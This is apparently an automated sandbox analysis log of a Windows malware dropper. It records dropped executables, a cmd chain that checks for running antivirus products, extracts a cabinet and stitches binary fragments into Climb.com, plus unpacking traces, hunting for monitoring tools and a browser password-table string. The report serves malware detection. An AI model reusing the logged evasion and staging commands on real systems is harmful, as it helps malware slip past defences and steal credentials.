Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Climb.com, 0000000D.00000003.2190973677.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167739570.0000000003C97000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2190635881.0000000003C9E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: vUcZzNWkKc.exe	ReversingLabs: Detection: 47%
Source: vUcZzNWkKc.exe	Virustotal: Detection: 31%

Source: vUcZzNWkKc.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: vUcZzNWkKc.exe	String found in binary or memory: 3The file %s is missing. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\vUcZzNWkKc.exe "C:\Users\user\Desktop\vUcZzNWkKc.exe"
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: vUcZzNWkKc.exe

Static file information: File size 7088640 > 1048576

Source: vUcZzNWkKc.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x518a00
Source: vUcZzNWkKc.exe	Static PE information: Raw size of ycplgdyn is bigger than: 0x100000 < 0x1a5200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe

Unpacked PE file: 0.2.vUcZzNWkKc.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ycplgdyn:EW;spankfnb:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 1_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

1_2_00406328

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: vUcZzNWkKc.exe	Static PE information: real checksum: 0x6c986d should be: 0x6c95fd
Source: PasoCattle.exe.0.dr	Static PE information: real checksum: 0x102e74 should be: 0x10b21d

Source: vUcZzNWkKc.exe	Static PE information: section name:
Source: vUcZzNWkKc.exe	Static PE information: section name: .idata
Source: vUcZzNWkKc.exe	Static PE information: section name:
Source: vUcZzNWkKc.exe	Static PE information: section name: ycplgdyn
Source: vUcZzNWkKc.exe	Static PE information: section name: spankfnb
Source: vUcZzNWkKc.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: vUcZzNWkKc.exe

Static PE information: section name: ycplgdyn entropy: 7.952986238509369

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Jump to dropped file
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe	Jump to dropped file
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
